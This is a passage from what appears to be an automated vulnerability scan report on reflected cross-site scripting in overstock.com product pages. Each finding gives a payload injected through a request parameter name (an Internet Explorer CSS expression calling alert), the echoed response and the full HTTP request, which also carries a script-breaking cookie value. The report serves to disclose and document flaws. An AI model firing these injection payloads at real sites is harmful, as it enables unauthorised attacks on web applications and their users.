GET /Luggage-Bags/CalPak-S-Curve-Solid-18-Inch-Lightweight-Utility-Backpack/3442998/product.html?df9cc"style%3d"x%3aexpression(alert(1))"6a8611f58b1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb61"style%3d"x%3aexpression(alert(1))"c4278e9b889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffb61"style="x:expression(alert(1))"c4278e9b889 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Heys-Digital-E-scale/4333013/product.html?ffb61"style%3d"x%3aexpression(alert(1))"c4278e9b889=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.477. http://www.overstock.com/Luggage-Bags/Heys-XCase-20-inch-Carry-on-Luggage/3378644/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f7c"style%3d"x%3aexpression(alert(1))"b0235146ee5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1f7c"style="x:expression(alert(1))"b0235146ee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Heys-XCase-20-inch-Carry-on-Luggage/3378644/product.html?d1f7c"style%3d"x%3aexpression(alert(1))"b0235146ee5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.478. http://www.overstock.com/Luggage-Bags/Korus-Aca-De-Grande-19.5-inch-Wheeled-Backpack/4089367/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd45"style%3d"x%3aexpression(alert(1))"1b122b1c80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cd45"style="x:expression(alert(1))"1b122b1c80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Korus-Aca-De-Grande-19.5-inch-Wheeled-Backpack/4089367/product.html?8cd45"style%3d"x%3aexpression(alert(1))"1b122b1c80=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.479. http://www.overstock.com/Luggage-Bags/Olympia-22-inch-8-pocket-Rolling-Duffel/3147701/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf29"style%3d"x%3aexpression(alert(1))"8c41c321b04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cf29"style="x:expression(alert(1))"8c41c321b04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Olympia-22-inch-8-pocket-Rolling-Duffel/3147701/product.html?3cf29"style%3d"x%3aexpression(alert(1))"8c41c321b04=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.480. http://www.overstock.com/Luggage-Bags/Olympia-29-inch-8-pocket-Rolling-Duffel/3147702/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1193f"style%3d"x%3aexpression(alert(1))"68968acd1d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1193f"style="x:expression(alert(1))"68968acd1d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Olympia-29-inch-8-pocket-Rolling-Duffel/3147702/product.html?1193f"style%3d"x%3aexpression(alert(1))"68968acd1d1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.481. http://www.overstock.com/Luggage-Bags/Olympia-30-inch-Drop-bottom-Rolling-Duffel-Bag/4226715/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895d1"style%3d"x%3aexpression(alert(1))"014cecababd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 895d1"style="x:expression(alert(1))"014cecababd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Olympia-30-inch-Drop-bottom-Rolling-Duffel-Bag/4226715/product.html?895d1"style%3d"x%3aexpression(alert(1))"014cecababd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.482. http://www.overstock.com/Luggage-Bags/Pacific-Gear-19-inch-Multi-Zippered-Pocket-Rolling-Backpack/5016785/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68cd2"style%3d"x%3aexpression(alert(1))"5a7a730de90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68cd2"style="x:expression(alert(1))"5a7a730de90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Pacific-Gear-19-inch-Multi-Zippered-Pocket-Rolling-Backpack/5016785/product.html?68cd2"style%3d"x%3aexpression(alert(1))"5a7a730de90=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.483. http://www.overstock.com/Luggage-Bags/Purdue-Collegiate-Sport-Duffel/4579529/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41ac"style%3d"x%3aexpression(alert(1))"3c14d51b11b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41ac"style="x:expression(alert(1))"3c14d51b11b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Purdue-Collegiate-Sport-Duffel/4579529/product.html?f41ac"style%3d"x%3aexpression(alert(1))"3c14d51b11b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.484. http://www.overstock.com/Luggage-Bags/Solo-Colombian-Leather-Laptop-Portfolio/3166854/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 767fc"style%3d"x%3aexpression(alert(1))"2e750e9585d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 767fc"style="x:expression(alert(1))"2e750e9585d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Solo-Colombian-Leather-Laptop-Portfolio/3166854/product.html?767fc"style%3d"x%3aexpression(alert(1))"2e750e9585d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.485. http://www.overstock.com/Luggage-Bags/Travel-Select-Amsterdam-4-piece-Luggage-Set/711428/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e534a"style%3d"x%3aexpression(alert(1))"4dab829b28f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e534a"style="x:expression(alert(1))"4dab829b28f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Travel-Select-Amsterdam-4-piece-Luggage-Set/711428/product.html?e534a"style%3d"x%3aexpression(alert(1))"4dab829b28f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.486. http://www.overstock.com/Luggage-Bags/Travel-Select-Amsterdam-Lightweight-29-inch-Rolling-Upright-Suitcase/3019553/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e604f"style%3d"x%3aexpression(alert(1))"84c3654c28d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e604f"style="x:expression(alert(1))"84c3654c28d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Travel-Select-Amsterdam-Lightweight-29-inch-Rolling-Upright-Suitcase/3019553/product.html?e604f"style%3d"x%3aexpression(alert(1))"84c3654c28d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.487. http://www.overstock.com/Luggage-Bags/Travel-Select-Light-Weight-Amsterdam-21-inch-Carry-on/2969442/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b39fe"style%3d"x%3aexpression(alert(1))"9c09303fe20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b39fe"style="x:expression(alert(1))"9c09303fe20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Travel-Select-Light-Weight-Amsterdam-21-inch-Carry-on/2969442/product.html?b39fe"style%3d"x%3aexpression(alert(1))"9c09303fe20=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.488. http://www.overstock.com/Luggage-Bags/Travelers-Choice-Siena-21-inch-Hybrid-Upright-Garment-Bag/4313510/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e21"style%3d"x%3aexpression(alert(1))"36922d5edec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52e21"style="x:expression(alert(1))"36922d5edec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/Travelers-Choice-Siena-21-inch-Hybrid-Upright-Garment-Bag/4313510/product.html?52e21"style%3d"x%3aexpression(alert(1))"36922d5edec=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.489. http://www.overstock.com/Luggage-Bags/U.S.-Traveler-RIO-2-piece-Expandable-Carry-on-Luggage-Set/3275005/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e2b8"style%3d"x%3aexpression(alert(1))"1ea14a637b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3e2b8"style="x:expression(alert(1))"1ea14a637b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
